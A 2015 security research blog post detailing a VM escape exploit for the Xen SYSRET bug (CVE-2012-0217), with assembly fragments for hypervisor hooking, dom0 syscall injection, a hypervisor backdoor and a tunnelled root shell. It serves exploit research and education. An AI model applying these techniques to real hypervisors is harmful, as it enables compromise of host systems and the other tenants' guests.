Adventures in Xen Exploitation


This post is about my experience trying to exploit the Xen SYSRET bug (CVE-2012-0217).

This issue was patched in June 2012 and was disclosed in Xen Security Advisory 7 [1]. The bug was found by Rafal Wojtczuk and Jan Beulich. Rafal gave a talk about it at BlackHat USA 2012, [2][3].

Xen versions unpatched 4.1.2 and earlier releases are affected. In short, we won, learnt a lot and came up with some novel techniques along the way.

Overview, Assumptions and Prerequisites

In this post we will look into the process of developing a VM escape exploit, give some ideas on the complexity of achieving robustness, and how even with a good set of instructions to follow from other researchers you can run into some unexpected scenarios and some tough choices.

I make the assumption that you know enough about Xen to know the difference between dom0 and domU, as well as what paravirtualized (PV) and hardware virtualized (HVM) guests are. If you don’t, I recommend reading through some of the Xen wiki [OW1]  [4], which is a great resource.

I also want to note that I try to reference previous works as much as possible. There are probably tricks or techniques that are used that have been documented previously and I don’t necessarily mean to take credit for those. If you find I’m missing proper credit for some technique please let me know and I’ll update this post.

Why Exploit a Three-Year Old Bug?

Although this bug is a little old by today’s standards, we thought it would be a good way to learn about Xen, which I’d never used before. We also wanted to try virtual machine (VM) escape exploitation in general, which we’d never got around to doing before.

There is a great write up [5] on the exploitation of this bug by Jordan Gruskovnjak at VUPEN. His blog post describes using an approach found by Rafal Wojtczuk to reliably exploit the vulnerability without relying on knowing the Xen address space, which is really nice.

I highly recommend reading this before continuing with my post, because I reference it often and skip over a lot of the details to avoid redundancy where possible.

Despite the very descriptive post from VUPEN, no public exploits for this bug exist. So I thought it would be fun to recreate their findings and see how far I could get.

I do think it is worth noting that iZsh from fail 0verflow did release an exploit [6] targeting the same underlying SYSRET bug on FreeBSD, which is a worthwhile read.  Although the bug has the same underlying cause, exploitation on Xen is quite different and can mostly be considered a different bug.

Exploit development environment

I figured having a working hypervisor debugger [7] was key to getting an exploit working, and it was indeed invaluable. The 4.1.x tree however does not support the debugger by default, but I was able to easily backport the patch from the Mercurial repository. There is one other small patch [8] needed. Also there are some posts about what Xen arguments you need to enable the console [9], which I found quite useful.

Overall the debugger is pretty nice, although at times it just won’t work depending on register state, so sometimes some creativity is required to actually know what’s actually happening in your payload. It supports some useful features like dumping the interrupt dispatch table (IDT), machine specific registers (MSRs), etc.

The debugger uses the serial console, so I figured the easiest way to have this work was to run Xen itself inside of a VM. I had no luck getting it to work in VMWare Workstation, but VirtualBox worked okay as long as Enable APIC I/O was enabled. This let me easily attach to and interact with the debugger’s serial console.

Triggering the bug requires a 64-bit paravirtualized (PV) domU and requires you to be in the kernel, in order to trigger a hypercall that actually results in the sysret instruction being called. I developed my exploit as a Linux Kernel Module (lkm), although you could presumably use any 64-bit PV guest to do it.

I used a 64-bit dom0 Linux VM to start and created a 64-bit domU. In order to ssh into the dom0 and domU VMs I had to setup secondary host-only bridged interfaces in VirtualBox and update the Xen configs to use them, but once that was done I could easily copy my lkm to domU and write shell scripts to automate restarting domU via Xen tools as needed.

It’s worth noting that in addition to the hypervisor debugger, I often relied on custom Xen builds to print debugging messages letting me know I was hitting the intended code paths.

Goals of exploitation

I try to keep a list of my high level goals when I’m exploiting something. I had a few high level goals for this exploit, many of which went beyond what was described in the public exploit blog post.

  • Reliable exploitation without leaking Xen address space
  • Bypass SMEP
  • Vulnerability detection
  • Hypervisor architecture detection
  • dom0 architecture detection
  • 32-bit and 64-bit dom0 migration
  • dom0 OS detection
  • Inter-domain data tunneling for payloads

I’ll discuss most of these in detail throughout this post.

Determining vulnerability

Before I jump into my experience triggering the vulnerability, I wanted to quickly talk about determining if the system you’re on is actually vulnerable. There are effectively four basic requirements for the exploit to work:

  • Has to be an Intel CPU
  • Has to be a 64-bit paravirtualized (PV) guest
  • Has to be a vulnerable Xen version
  • Has to be a 64-bit version of Xen hypervisor

Most of these are reasonably easy to deduce, but I think it’s worth mentioning because a lot of VM escape exploit talks and posts don’t actually talk much about profiling their environment to know what their world looks like.

Determining CPU type

The CPUID instruction supports returning a vendor identification string, which is “GenuineIntel”. This is returned when you execute CPUID with EAX set to 0. EBX, EDX, and ECX will contain the vendor string. More about this can be seen in the Intel 64 and IA-32 Architectures Software Developer’s Manual [10]. Also the fail0verflow sysret exploit mentioned earlier contains an example of this being done.

Has to be a 64-bit PV guest

Determining if the machine you are on is paravirtualised is relatively easy. You can query dmesg output to see if it mentions Xen, you can look for Xen frontend drivers in lsmod output. The easiest way to test though is to just look for /sys/hypervisor/ entries which are populated by the Xen drivers.

A hardware VM (HVM) guest will typically be oblivious to the fact that it’s running as a Xen guest, so won’t have these same virtualization artifacts.

If for some reason on a PV guest you can’t determine that you’re paravirtualized using one of the above methods, the best alternative is to try to issue a hypercall that only is supported on PV guests. HVM guests only support a small subset of calls and any others will return -ENOSYS. You can check thehvm_hypercall64_table array in xen/arch/x86/hvm/hvm.c as an example of how few are supported.

This table looks like:

static hvm_hypercall_t *const hvm_hypercall64_table[NR_hypercalls] = {
    [ __HYPERVISOR_memory_op ] = (hvm_hypercall_t *)hvm_memory_op,
    [ __HYPERVISOR_grant_table_op ] = (hvm_hypercall_t *)hvm_grant_table_op,
    [ __HYPERVISOR_vcpu_op ] = (hvm_hypercall_t *)hvm_vcpu_op,
    [ __HYPERVISOR_physdev_op ] = (hvm_hypercall_t *)hvm_physdev_op,
    [ __HYPERVISOR_arch_1 ] = (hvm_hypercall_t *)paging_domctl_continuation

The list of PV hypercalls can be found in xen/include/public/xen.h by looking at the functions prefixed with HYPERVISOR_ . You can see there are significantly more. Just as a basic example, consider HYPERVISOR_get_debugreg. This corresponds to the do_get_debugreg() function:

unsigned long do_get_debugreg(int reg)
    struct vcpu *curr = current;
    switch ( reg )
    case 0 ... 3:
    case 6:
        return curr->arch.debugreg[reg];
    case 7:
        return (curr->arch.debugreg[7] |
    case 4 ... 5:
        return ((curr->arch.pv_vcpu.ctrlreg[4]   X86_CR4_DE) ?
                curr->arch.debugreg[reg + 2] : 0);
    return -EINVAL;

It’s quite obvious this function returns something other than -ENOSYS, so if do get -ENOSYS you know you’re in an HVM guest, otherwise you’re in a PV guest.

Also it should be obvious if you’re already running your 64-bit binary on domU but you can determine if you’re on a 64-bit system by simply calling uname(2) or running the uname -p command. So that combined with your PV indicator is all you need.

Has to be a vulnerable Xen version

How can you tell if Xen is actually vulnerable?

Conveniently Xen provides version information to the guests in a hypercall. On PV guests this is also typically exposed in the aforementioned/sys/hypervisor/ directory tree, specifically in /sys/hypervisor/version/major, /sys/hypervisor/version/minor, and /sys/hypervisor/version/extra. You can combine the values in these to determine the general version. 

One minor point related to determining vulnerability is when a specific version, like 4.1.2 in our case, was vulnerable but a patch was provided which means that the version alone might not indicate vulnerability.

Xen conveniently provides even more metadata we can use, specifically the compile date of the hypervisor, which can be found in/sys/hypervisor/compilation/compile_date. If a patch was released for 4.1.2 in June 2012, if we test the compile_date value and see that was built before June 2012, we can be fairly sure about the presence of the vulnerability.

Here is some output from a domU guest:

$ cat /sys/hypervisor/version/major
$ cat /sys/hypervisor/version/minor
$ cat /sys/hypervisor/version/extra
$ cat /sys/hypervisor/compilation/compile_date
Tue Feb 3 15:14:26 GMT 2015

If for some reason these /sys/hypervisor/ files are not accessible, I noted there is a hypercall where this information actually comes from. This is called the xen_version hypercall, and from an lkm you can call it like so (with the right xen headers included):

version = HYPERVISOR_xen_version(XENVER_version, NULL);

The first parameter indicates the subcommand you want to send to the hypercall. XENVER_version shown above gives you the major and minor numbers. XENVER_extraversion, XENVER_compileinfo, XENVER_commandline, and others can get you even more information.

Has to be a 64-bit hypervisor

In order to trigger the vulnerability, the hypervisor itself must be 64-bit. I didn’t investigate ways to determine this property much because there was one easy answer in my context. A 32-bit hypervisor is not capable of running a 64-bit PV guest, only a 64-bit HVM guest. If you can determine you are a 64-bit PV guest, then you already know it’s a 64-bit hypervisor.

It’s not entirely clear to me at the moment how best to determine the architecture of the hypervisor otherwise. I suspect there will be some structure values you can query from a hypercall that will be populated in 32-bit and not on 64-bit, or vice versa. Similarly there might be some per-architecture hypercall behaviors you can somehow differentiate between. This is something for future research and I’d be interested to hear any approaches or ideas people have.

Getting code execution

So now that we can tell if the system is vulnerable, let’s move onto actually triggering the bug.

As noted, the VUPEN write up is really good and I’m not going to bother re-explaining a lot of what it already says. However, there were a few areas where my results deviated from what they described or where what they described was ambiguous or misleading (at least to me). These are topics I will touch on here. I recommend having the VUPEN article open for reference as you read the following section, as I’ll regularly reference pieces of their blog post.

The first difference I had related to the use of the mmap_region() function. The prototype of this function has changed across different versions of the Linux kernel. At one point it took six arguments, as demonstrated in the VUPEN blog, however, it takes five arguments on modern kernels. This is easy to work around, but you want to be aware of the version your lkm is built on so that you can pass the arguments appropriately. You can useLINUX_VERSION_CODE to determine what the kernel version will be at build time.

The API change was made in commit c22c0d6344c362b1dde5d8e160d3d07536aca120, which was first introduced to Linux release 3.9. So anything earlier than 3.8 uses six arguments.

The second thing to mention is related to what happens inside emulate_privileged_op(). The VUPEN blog describes it as follows:

“Eventually the “emulate_privileged_op()” is called in “xen/x86/traps.c”, but will generate a #PF in the “read_descriptor()” sub function on the following piece of code … The “__get_user()” macro actually uses the current segment selector as the index in the kernel virtual GDT / IDT which causes a #PF on an invalid read.”

The article then describes how to work your way out of the do_page_fault() scenario by manipulating the outcome of in_irq(). I found this part of the VUPEN write up somewhat misleading in that I didn’t initially interpret it as being required to supply a malformed segment selector ourselves to cause the read to fail.

In my testing a #PF was not actually generated by the __get_user() macro by default. So I figured I have to specifically force it to fail, otherwise I’d end up staying inside read_descriptor(), which I don’t want. VUPEN describes this as causing an invalid read due to current segment selector, but I didn’t originally interpret it as meaning I had to provide a malicious value.

As a reminder, this is the code that we’re stuck in, from xen/arch/x86/traps.c:

if ( !vm86_mode(regs) )
      if ( sel < 4)
          desc.b = desc.a = 0;
      else if ( __get_user(desc,
                      (const struct desc_struct *)(!(sel   4)
                                                   ? GDT_VIRT_START(v)
                                                   : LDT_VIRT_START(v))
                      + (sel >> 3)) )
          return 0;

So if __get_user() is not going to throw a #PF by default, we need to figure out if we can force it to fail. This is the only code in the whole read_descriptor() function that returns 0, which we would like, so our answer will be in the __get_user() macro or the parameters passed to it.

The __get_user() macro itself simply reads from a userland pointer, as indicated below.

* This macro copies a single simple variable from user space to kernel
* space.  It supports simple types like char and int, but not larger
* data types like structures or arrays.  [...]
#define __get_user(x,ptr) 

The macro itself doesn’t really give us the opportunity to force it to fail, so we have to instead look to the arguments. First, how do theGDT_VIRT_START() and LDT_VIRT_START() macros work?

/* The address of a particular VCPU's GDT or LDT. */
#define GDT_VIRT_START(v)    
#define LDT_VIRT_START(v)    
    (GDT_VIRT_START(v) + (64*1024))

We see that both construct the address to dereference using the virtual CPU (vcpu) identifier. If we could manipulate this, we might be able to force the read to fail and then page fault on an invalid address. We need to know where v comes from in this context.

If we go back and look at the read_descriptor() call in emulate_privileged_op() we’ll see that the variable v simply points to current, which if you’ve read the VUPEN article, you know we control because it is basically a macro that points to the top of our controlled stack.

static int emulate_privileged_op(struct cpu_user_regs *regs)
    struct vcpu *v = current;
        if ( !read_descriptor(regs->cs, v, regs,
                           code_base,  code_limit,  ar,
                          _SEGMENT_CODE|_SEGMENT_S|_SEGMENT_DPL|_SEGMENT_P) )
        goto fail;

We have two options. One that VUPEN indicated, which is that we also control the regs argument, which means we can provide an arbitrary regs->cs selector, which can be used to cause an invalid address.

Alternately, we can provide an arbitrary vcpu->vcpu_id value, and achieve similar results. As long as we make this an invalid address, we can trigger the #PF that VUPEN mentioned, and get the result from __get_user() we want. I ended up using the modified vcpu_id because it wasn’t until afterwards I realized what was meant by the selector causing it to fail.

There is one last thing that I found misleading in the VUPEN write up, which is related to using do_guest_trap() to actually overwrite the return address and cs selector that will be used during the iretq.

The way this trick is described by the VUPEN blog post is:

“The current pointer is again used to initialize the trap_bounce structure. The addresses of the two structures are offsets from arch pointer which is a field of the current pointer. One can easily supply an arbitrary arch pointer such that the tb->cs and tb->eip will overlap with respectively the saved CS and RIP of the instruction after the SYSRET instruction which generated the #GP fault.”

The arch member of the vcpu structure is not a pointer, it’s just an inline structure. This means you can’t actually provide an arbitrary arch pointer in order to overlap the trap_bounce structure. The approach is slightly different than what is implied. I have no doubt what I do is exactly what they did, I just want to clarify what was actually meant, to aid anyone else that tries to exploit the bug. So how do we do it then?

What we need to do is use the vcpu pointer itself to facilitate the overlap. This worried me at first because the stored return address and cs selector we want to overwrite are on the stack currently being used, and we have to overlay the entire vcpu structure onto stack. This means that as functions and stack frames are used along the exploit paths, we’re manipulating values inside the fake vcpu structure. The biggest concern here was that the unavoidable stack usage while working our way to do_guest_trap() would end up overwriting the values from the trap context that we wanted to still have control over so that they would be written to the trap_bounce structure, which overlaps our overwrite target.

If the vcpu structure wasn’t so massive and specifically the distance between

vcpu->arch.trap_bounce and vcpu->arch.guest_context.trap_ctxt wasn’t so big, we could’ve run into trouble. In practice the distance between the two parts of the structure was over 0x1000 bytes, so left enough room to avoid unwanted corruption. To better understand what exactly is happening with this vcpu overlap, and how the arch.guest_context.trap_ctxt values influence the saved return values for the iret, arch.trap_bounce are designed to overlap, I’ve tried to illustrate the situation below.

So once that’s all finished the iretq will occur and we’ll jump to an arbitrary address and code selector we control, which we can use to execute code within the hypervisor context.

When it comes to an exploit like this however, which VUPEN correctly equated to remote kernel exploitation, getting code execution is often only the beginning. More fun to follow.

Bypassing SMEP

I was able to successfully bypass SMEP while exploiting this bug.

A separate blog post about bypassing SMEP has been made available here:

Xem SMEP and SMEP Bypass

Stage 1 payload

My payload is broken into three broad stages. The first stage is executed in what is sometimes referred to as the ‘fault context’, which isn’t ideal for doing a lot of work. Operating solely from this context wouldn’t allow us to safely poke around other domains or anything like that. So the goal of stage 1 is simply to hook into the hypervisor and setup a stage 2 payload that will be called from within the process context.

This is done by hooking the IDT at index 0x80, which is still used for system calls on some 32-bit x86 OSes. The IA32_SYSENTER_EIP machine specific register (MSR) which holds the entry point when handling ring3 to ring0 transitions via the sysenter instruction, used for syscalls on most 32-bit x86 OSes. And lastly the IA32_LSTAR MSR which holds the entry point when handling ring3 to ring0 transitions via the syscall instruction, used for syscalls on 64-bit x86 OSes.

Why we hook all three of these will become clear in later phases, but basically it allows us to support 32-bit and 64-bit dom0 migration, and also carry out dom0 OS detection.

We need to point all of these hook locations to our stage 2 payload, which then raises the question, where do we store stage 2. We need to dynamically find a place to store the stage 2 payload. The VUPEN paper discusses storing this in an unused portion of the Hypervisor, since the .text segment is RWX. At first I tried to scan for a NULL cavity after .text ended and before the read-only data, however in practice I never found a spot big enough. I also tried scanning backwards to find an ELF header for the hypervisor in hopes of parsing it to determine the exact point that certain cavities might exist, but it turns out no ELF header is in memory.

One option then would be to simply scan for certain patterns in dead code, like a panic() function, or some debugging routines and store the payload there. Depending on your payload size though, this could be somewhat limiting. Instead I started poking around the memory space. If you look at where the Xen hypervisor code starts in memory you’ll see this:

*  0xffff82d080000000 - 0xffff82d0bfffffff [1GB,   2^30 bytes, PML4:261]
*    Xen text, static data, bss.

However, in practice the hypervisor is actually mapped into memory at an offset inside of that base address. You can see that in the Xen loader script atxen/arch/x86/

#if !defined(EFI)
  __image_base__ = .;
  . = __XEN_VIRT_START + 0x100000;
  _start = .;
  .text : {

In my testing it seemed that the memory between __XEN_VIRT_START and __XEN_VIRT_START+0x100000 was largely unused. So I simply scanned backwards from a .text address I knew in the hypervisor until I found a cavity of NULLs large enough to hold the payload.

This seemed stable in all of my testing, however it’s possible that it is used for something I overlooked. To be clear, we’re running inside stage 2 so finding a valid hypervisor .text address is trivial. We can just use one the original function address in one of the MSRs we hook, etc.

There is another more reliable way to store the payload without relying on the above, however, it will be described in the future post about bypassing SMEP.

So, now that we’ve got a place to store stage 2 and we’ve hooked everything we need stage 1 to exit cleanly from the hypervisor. Ideally this should jump back into our LKM in domU cleanly, so that we can unload the module (eventually) and also not cause any issues on the hypervisor end. We can simply setup a custom iret stack that points to some safe spot in our LKM that allows us to recover, and we’re good. This is no different than most kernel exploit payloads that need to transition from ring0 to ring3, which have been used for ages.

To allow my exploit to resume exactly after the sysret call I issue to trigger the bug, I store my exploits stack pointer right before the call inside my payload. I also store the address of a label immediately following the jump to my syscall instruction that will be jumped to. This looks like the following:

__asm__ __volatile__(
    "movq %0, %%raxnt"
    "movq %%rsp, (%%rax)nt"
    "movq %1, %%rspnt"
    "jmp *%%rbxnt"
    : "g"(orig_stack), "g"(sp), "b"(SYSRET_ADDR)

And my recovery code in the stage 1 payload is:

pushq $0xe02b                # SS segment
movq orig_stack(%rip), %rax
pushq %rax                   # Stack address (orig_stack)
pushq $0x246                 # RFLAGS
pushq $0xe033                # CS segment
movq safe_label(%rip), %rax  # Safe return address (recover label)
pushq %rax

Stage 2 payload

So now that stage 2 payload in place and we might be entering it from one of three hooks, we record the trap type before jumping to a central entry point. Our stage 2 payload will be responsible for a lot of work.

dom0 detection

We want to target processes trapping into the hypervisor from dom0 only, and ignore the rest. VUPEN mentioned only targeting dom0, but doesn’t actually say how. When you intercept a trap a legit vcpu structure will accessible on the current stack, so we can basically replicate what Xen itself does. We get a pointer to the vcpu and we grab it’s vcpu->domain pointer, which contains a domain_id member. We simply exit early if this value is not zero.

mov $0xffffffffffff8000, %rax
andq %rsp, %rax
orq $0x7fe8, %rax
movq (%rax), %rax 
# Is this domain 0? - current->domain->domain_id
movq 0x10(%rax), %rbx
movq (%rbx), %rcx
cmp $0x0, %rcx
jne cleanup

Userland detection

VUPEN also didn’t mention exactly how this is done, but Xen conveniently provides a flag called TF_kernel_mode that indicates whether or not a trap occurred from kernel or userland. This can be found in the vcpu->arch.flags field.

Checking this flag is relevant only to when our payload is entered via a syscall instruction, where userland will use it for calling into syscalls in the guest kernel, and the guest kernel will use it for calling into hypercalls in the Xen hypervisor.  On the other hand, on 32-bit, sysenter is only used by userland calling syscalls in the guest kernel, so immediately lets you know it’s a userland process.  Similarly int 0x80 is only used by userland for syscalls, whereas int 0x82 is used by the kernel for hypercalls.

Architecture detection

Now that we know we’ve trapped something from dom0 we want to know what architecture it is, as this will inform how we actually migrate into it eventually. In general the easiest way to do this is detect how the process trapped into the payload. 64-bit Linux will issue syscalls via the syscall instruction. 32-bit Linux will use the sysenter instruction.

Relying just on the trap type isn’t quite enough however because of 32-bit compatibility, which could mean that a 32-bit process is running on 64-bit Linux. Fortunately Xen provides a flag that indicates if the domain is a 32-bit PV guest or not, which can be found in vcpu->domain->arch.is_32bit_pv. So we can use the trap type as a general indicator, but make sure we’re correct by double checking against this value.

OS detection

Technically dom0 can be Linux, NetBSD, or OpenSolaris. The latter is discontinued and only OpenSolaris 2009 was a supported dom0, so I don’t worry about it atm. If we want to migrate into dom0 it is better to try to determine what operating system it is rather than assume it is Linux.

There are a few ways this could be done. Two ways stood as the easiest to me.

One of the most obvious ways to me was to scan through the kernel memory of the trapping dom0 guest and search for some sort of identifiable string unique to each OS. This should be fairly reliable. I didn’t like this reason primarily because I was worried that strings might change and not be reliable, it is slow to search through all of memory, NetBSD contains references to the string “Linux” (so I’d have to find something potentially more volatile than something that simple) and lastly I don’t technically know when the kernel memory ends so could potentially crash running off the end of memory.

The second idea I had was to inject a system call into the trapping dom0 process that could be used to differentiate between the operating system. By finding a syscall that is valid on one and invalid on the other, it should be relatively easy to intercept the return value and figure it out. This is the route I went down. By comparing the syscall tables in 32-bit and 64-bit Linux, and NetBSD (which uses the same table for both architectures), I noticed one pretty quick.

In NetBSD they’ve got the following syscall, from /usr/src/sys/kern/syscalls.master:

391 IGNORED   
 old posix_fadvise

On NetBSD the IGNORED syscall types will simply return success. This is noted in the syscalls.master file header: “IGNORED syscall is a null op, but always succeeds”

On Linux there aren’t nearly so many syscalls, and 391 isn’t even valid. From /arch/x86/syscalls/syscall_64.tbl we see that syscalls end at value 313, and resume at 512.

319    common memfd_create         sys_memfd_create
320    common kexec_file_load      sys_kexec_file_load
321    common bpf                  sys_bpf
322    64     execveat             stub_execveat
# x32-specific system call numbers start at 512 to avoid cache impact
# for native 64-bit operation.
512    x32    rt_sigaction         compat_sys_rt_sigaction
513    x32    rt_sigreturn         stub_x32_rt_sigreturn
514    x32    ioctl                compat_sys_ioctl

And from /arch/x86/syscalls/syscall_32.tbl we see the maximum syscall value is 350. Unused system calls on Linux return -ENOSYS, via the sys_ni_syscall() function.

354  i386 seccomp         sys_seccomp
355  i386 getrandom       sys_getrandom
356  i386 memfd_create    sys_memfd_create
357  i386 bpf             sys_bpf
358  i386 execveat        sys_execveat               stub32_execveat

To reiterate this means if we inject syscall 391 into the dom0 process and intercept the result, a return of 0 means it’s NetBSD and a return of –ENOSYSmeans it’s Linux.

How do we inject syscalls? I won’t dive deeply into the details, but basically we have all of the information we need about the trapping process to save what it was trying to do, replace the values we want to control, and reset the return location so that it re-traps and we can resume the call it had wanted to make in the first place.

To provide a simple example, let’s examine the syscall instruction ABI. Syscall arguments are passed in %rdi, %rsi, %rdx, %r10, %r8, and %r9. The return address is stored in %rcx. The syscall number is stored in %rax. The userland stack is stored on our hypervisor stack, in order for us to later sysret or iretq back into userland. We simply store all of the argument registers, the original syscall number for restoration later. We then change them with whatever we want.

In the case of OS detection, we simply change %rax to hold 391. We also decrement the return address by 2, so that when the syscall returns, it lands back onto the syscall instruction in userland and re-traps, allowing us to restore things.

Finally, we store the userland stack and the address of the syscall instruction itself. We do this last part so that we can accurately identify the exact same process and thread that we intercepted the call from, since the combination of the userland stack address and execution address should be a reliably unique pair.

That’s it. Now we just pass the syscall off as usual and wait for the next trap. For every dom0 trap we receive we test to see if there is a match against the code and stack pointers we saved. If so, we know that this is the dom0 process we injected into, and the return value from the previous syscall will be in %rax. As noted earlier, if it’s -ENOSYS we know it is Linux. If it’s 0, we know it is NetBSD.

I gave one example of injecting syscalls, but note that how this is done will depend on the actual trap type that was used to enter the payload. The syscall, int $0x80 and sysenter instructions all need to be handled in different ways in order to effectively inject and force re-traps.

There can also be shortcuts to the above. For instance, NetBSD still doesn’t support using sysenter for syscalls, so if the stage 2 payload is entered via sysenter, you can be reasonably sure it is Linux already and skip the injection.

Note that although I show how to differentiate between the dom0 OS, the rest of this article discusses things within the context of migrating into Linux, as it is highly unlikely that NetBSD would ever be encountered.

Finding a root process

The VUPEN article mentions identifying a root process to migrate into, but they don’t mention how they actually detect if a process is root. The first way I thought to do this was to mimic the way a kernel exploit or rootkit manipulates a process, which is just basically finding the associated kernel credential structure in memory and then testing it for root. There are a few problems with this approach.

First, you run into the same problem some kernel rootkits and exploits have where they can’t always be 100% certain what the credential offset is within the task structure, due to unknown configuration options, and in our case an unknown kernel version in dom0 as well. The way this is typically solved is by finding the task_struct base and searching for a known process name. The idle task on Linux is called swapper so it can be reliably searched for in order to find the comms array within the task_struct. From there you can easily work backwards to find the credential structure. One example of this being done is in an Android rootkit demonstrated in in Phrack 68 [11].

In order to find the task_struct base in our case, we’d need to query the kernel stack for the process that is trapping, access the thread_info structure on the stack, which will point us to the task_struct. In order to do this for the idle task, we’d have to test if the trapping dom0 process is actually userland or kernel. Xen provides a flag to indicate this on PV guests as noted. So far so good, but we run into a different problem.

When a userland process traps into the hypervisor via a syscall-related instruction, the page tables are setup to access userlands memory only, not the kernels. So we can find the kernel stack address by parsing the vcpu structure, but we can’t actually access it. Transitioning to the guest’s kernel page tables is non-trivial to re-create and otherwise would require calling into a Xen function we don’t know the address of, so this leaves us in a situation where even if we knew the credential offset, we can’t easily get at it.

So I just scrapped that idea. Instead I decided to just go back to the syscall injection route. We already inject syscalls to do OS detection, and if you’ve read the VUPEN paper, you know that’s how we’ll migrate into the dom0 process, so we may as well do it for root detection. We simply do exactly what was described for injecting the syscall for OS detection, but inject a getuid() syscall. If the return value is zero, then we move onto the next phase of migration, otherwise we just restore the original syscall and leave the process alone.


Once we have a root process candidate, the process I follow is very similar to what VUPEN described. Inject a mmap() call to allocate a RWX buffer, record the return address upon encountering the re-trap, copy a stage 3 userland payload into the new buffer, and redirect execution to the payload by changing the return address. I let this particular syscall fail which will just return to us to the buffer. As long as we have recorded the original values, we can have our stage 3 payload let us know when to restore it.

And of course depending on the underlying architecture of the dom0 process, I inject a different stage 3 payload.

It should be noted that one caveat to the payload I wrote is that the root process might actually be jailed in something like a namespace, and not actually have true root on the system. In order to break out of the namespace it would be ideal to simply patch the task_struct in the kernel, however we run into some of the problems mentioned above. One possibility is that once we have code running inside a process and know it’s process name, we could technically tell the stage 2 payload the name of our process and have it search through the task structure linked list at a time when the kernel page tables are setup correctly. If I recall correctly though, even if you know the comms array offset, finding the namespace pointer is not as straightforward as finding the credentials structure. I haven’t implemented this yet, so won’t discuss it further.

Stage 2 summary

Obviously stage 2 had a lot to do. It can be hard to remember all of the different things it needs to do, so I’ve provided a fairly simple flow diagram to show the various stages that it will come in and out of play and how it works through everything that is needed.

Stage 3 payload

So now we’ve got our code running in a root process. The VUPEN article mentions using a bindshell or a connectback payload. I don’t like the idea of a bindshell because you don’t necessarily know the IP address of the dom0 system, so don’t easily know where to connect. Also both a bindshell and connectback payload suffer from failure in the event that the dom0 is restricted to an isolated network or has strict firewall controls.

I wanted to be able to access dom0 without any of these restrictions by using an inter-domain communication channel. Tunneling data between the guest and host in a VM escape exploit seems ideal. Kostya Kortchinsky used a framebuffer as a communication channel when exploiting VMWare [12]. I’m pretty sure there are other examples, but I couldn’t dig any up, other than things like cache-based covert channels.

So like most things there are a few options with how to approach this. Originally I thought about using shared memory between domU and dom0 as a communication channel, much in the way the frontend and backend drivers communicate in paravirtualized guests. However, the issue with this is that dom0 must actively accept a grant offering from domU, which means doing so in the kernel. I didn’t want to have to compile an lkm once I was on dom0.

Another approach I thought about was using XenStore, which is an OpenFirmware-like text-based filesystem used to share information between guests and dom0, and is accessible from dom0 userland using the Xen API. And is accessible by default in PV guests. My issue with this approach was relying on certain libraries being available on dom0, the complexity of interacting with XenStore without the libraries, and the relatively low bandwidth that would be provided by something not meant for data transfers.

I decided that since I already have control of the hypervisor and it’s easy to trap into it in an identifiable way, I would just use the hypervisor itself as an intermediary for proxying data between domains. Although I didn’t mention it earlier, part of my stage 2 payload is basically a syscall backdoor. I can detect processes making certain backdoor requests and basically proxy data between memory locations. I use a simple polling mechanism on both dom0 and domU side.

As an example let’s say dom0 makes a backdoor call to transfer up to 4kb of memory. The stage 2 payload takes this and stores it in an intermediary buffer. Meanwhile domU is polling with a separate backdoor call to see if there is any data for it to receive from dom0. On the next iteration the backdoor call will see that there is indeed data pending and will copy it over. By using a separate dom0 and domU data buffer, it’s easy to seamlessly transfer data between the two.

In order to make this work well for spawning a shell on dom0, I break my stage 3 payload into two parts. After forking into its own process it sets up 2 pipes and then fork()’s again. One copy of the process acts as a data proxy, copying data from the read pipe through the hypervisor backdoor, as well as reading data from the hypervisor backdoor and writing it to the write pipe. The other process uses dup2() to make the read and write pipe stdin and stdout/stderr respectively, and then spawns a shell as normal. This ends up looking like what is show in the next illustration.

To make this usable from the domU side I use a userland frontend for the exploit that drives the lkm through exploitation but then can use the data tunneling backdoor so that it is easy for the user to interact as if it were normal shellcode.

As a final note about this type of data tunneling in general, I just want to note that for this exploit it works well, however if you had only compromised dom0 directly, as demonstrated by @shiftreduce at 31C3 this year [13], you’d need to come up with another way; or you’d just have to break into the hypervisor from dom0, which he suggested he could do anyway.


The following screenshots show exploitation on a 32-bit and 64-bit machine respectively. You can see that the shell shows a separate system, indicated by the uname output, and also you can see that domain-0 is running at the time xl list is run.




So that’s it. If you made it this far hopefully you have some ideas about how to write your own VM escape exploit.

Although this bug is a little old I think it’s valuable to revisit interesting bugs and see what you can learn from them. Hopefully this shows the considerations that need to be made when blindly exploiting an OS can become quite complicated, but can be done in the right circumstances.

Thanks for reading.

If you have any comments or corrections please feel free to email me:

aaron <.>

adams <@>


  13. (Starts @ 1h50m): t=6609

Published date:  27 February 2015

Written by:  Aaron Adams

Call us before you need us.

Our experts will help you.

Get in touch
%d bloggers like this: